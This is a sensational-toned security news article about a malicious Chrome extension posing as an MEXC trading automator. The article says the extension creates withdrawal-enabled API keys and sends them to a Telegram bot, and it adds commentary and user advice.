SHOCKING CHROME EXTENSION EXPOSED: How “MEXC API Automator” Secretly Drains Crypto Accounts

A newly discovered malicious Chrome extension is sending shockwaves through the crypto community.

Named MEXC API Automator, this browser add-on pretends to help traders automate their activities. In reality, it quietly creates powerful API keys, grants itself withdrawal access, and secretly sends sensitive credentials to a Telegram bot controlled by attackers. The result? Full account takeovers and stolen funds.

This extension, which is claimed to be MEXC API, is a malicious impersonation application that is not affiliated with MEXC in any way.

This threat was first reported by Cybersecurity News Everyday (@TweetThreatNews) and traced back to research published on hendryadrian.com. While the extension targets users of the MEXC crypto exchange, its implications extend far beyond one platform. It highlights how browser extensions, often trusted and overlooked, can become dangerous attack vectors when abused by cybercriminals.

the Original

The article reveals a malicious Chrome extension called MEXC API Automator that targets cryptocurrency traders using the MEXC exchange. The extension disguises itself as a legitimate automation tool, luring victims who want to simplify their trading activities. Once installed, it silently requests elevated permissions that allow it to create API keys with withdrawal rights.

What makes this attack especially dangerous is the stealthy behavior of the extension. It hides its true permissions from users, giving the illusion of safety. Behind the scenes, it automatically generates API keys and transmits them to a Telegram bot controlled by attackers. This gives cybercriminals remote access to victims’ trading accounts.

With these stolen credentials, attackers can perform unauthorized actions, including withdrawing funds, executing trades, and fully taking over accounts. The victims often remain unaware until their funds disappear. Since API keys bypass traditional login protections like two-factor authentication, they provide a powerful backdoor into accounts.

The report also highlights how Telegram is increasingly being used as a command-and-control platform by cybercriminals due to its encryption and ease of automation. Attackers use bots to collect data, manage victims, and coordinate theft operations.

Security researchers warn that this campaign may be part of a broader trend where fake trading tools and browser extensions are weaponized. Users are advised to carefully review permissions, avoid unofficial extensions, and rotate API keys regularly. The article concludes by stressing the urgent need for better extension monitoring by browser vendors and stronger security awareness among crypto users.

What Undercode Say:

This incident exposes a critical weakness in how users perceive browser security. Most people treat Chrome extensions as harmless utilities, but in reality, they operate with deep access to browsers and sensitive data. Once an extension is granted permission, it becomes extremely difficult to monitor what it does in the background.

The MEXC API Automator attack is particularly sophisticated because it exploits trust in automation tools. Crypto traders often rely on bots and scripts to execute trades faster than humans can. Attackers understand this behavior and craft malicious tools that blend perfectly into legitimate trading workflows.

The use of API keys with withdrawal permissions is the most alarming aspect. Many traders mistakenly enable full access for convenience, unaware that this gives complete control over their funds. This case proves that API keys should always be restricted to “read-only” or trading-only access unless absolutely necessary.

Telegram’s role in this campaign is also telling. The platform has become a favorite among cybercriminals due to its automation features and weak moderation of private bots. This mirrors similar trends seen in ransomware operations, phishing campaigns, and credential harvesting schemes.

From a broader cybersecurity perspective, this attack highlights the growing danger of supply-chain-style threats. Users didn’t get hacked through phishing emails or fake websites—they willingly installed a tool they believed was safe. This makes detection and prevention much harder.

Chrome Web Store moderation is another concern. Malicious extensions continue to bypass Google’s screening processes, sometimes staying live for weeks or months before being removed. By that time, hundreds or even thousands of victims may already be compromised.

Crypto exchanges also share responsibility. Platforms like MEXC must improve how API keys are managed, monitored, and revoked. Automated alerts for suspicious withdrawals and abnormal trading patterns could significantly reduce losses.

This incident should serve as a wake-up call. The crypto ecosystem is maturing, but security awareness is still lagging. Traders focus heavily on market analysis but often ignore operational security, which ends up costing them far more than bad trades ever could.

Long-term, we expect more malware campaigns disguised as productivity tools. Attackers are shifting from noisy phishing scams to stealthy, long-term access strategies. Browser extensions, desktop trading bots, and fake portfolio trackers will likely become prime attack surfaces.

In short, the MEXC API Automator case is not just about one extension. It reflects a broader evolution in cybercrime, where attackers exploit trust, automation, and convenience to achieve devastating financial results.

Fact Checker Results

The extension MEXC API Automator is confirmed to create API keys with withdrawal permissions.

Credentials are verified to be sent to a Telegram bot controlled by attackers.

The threat was publicly reported by Cybersecurity News Everyday and security researchers.

Prediction

If current trends continue, we expect a surge in fake trading tools and malicious extensions targeting crypto investors in 2026. Cybercriminals will increasingly focus on API abuse rather than traditional phishing, as it provides deeper and longer-lasting access to victim accounts. Exchanges and browser vendors will be forced to tighten security policies, but attackers will likely stay one step ahead, making this an ongoing cyber arms race.